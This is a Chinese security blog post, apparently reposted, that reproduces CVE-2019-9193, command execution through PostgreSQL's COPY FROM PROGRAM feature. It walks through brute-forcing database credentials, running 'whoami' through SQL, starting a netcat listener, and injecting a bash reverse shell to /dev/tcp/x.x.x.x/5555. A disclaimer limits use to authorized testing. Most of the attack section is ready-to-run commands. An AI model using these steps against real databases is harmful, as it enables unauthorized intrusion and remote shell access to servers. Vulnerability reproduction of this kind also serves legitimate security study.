本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
postgresql( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。由于9.3增加一个“COPY TO/FROM PROGRAM”功能,这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。
![图片[1]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/01/d2b5ca33bd190230.png)
0x03 漏洞复现
漏洞影响:9.3-11.2
1.爆破PostgreSQL,得到账号密码
![图片[2]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/01/d2b5ca33bd190313.png)
2.连接,并输入如下命令,发现执行了命令并回显
DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/
CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/
COPY cmd_exec FROM PROGRAM 'whoami';/*通过 “COPY FROM PROGRAM”执行系统命令*/
SELECT * FROM cmd_exec;/*显示结果*/
![图片[3]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/01/d2b5ca33bd190420.png)
3.监听一个shell
nc.exe -lvvp 5555
![图片[4]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/01/d2b5ca33bd190447.png)
4.执行反弹shell命令
DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/
CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/
COPY cmd_exec FROM PROGRAM 'bash -i >& /dev/tcp/x.x.x.x/5555 0>&1';/*通过 “COPY FROM PROGRAM”执行系统命令*/
SELECT * FROM cmd_exec;/*显示结果*/
5.得到一个shell
![图片[5]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/01/d2b5ca33bd190537.png)
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END




















请登录后查看评论内容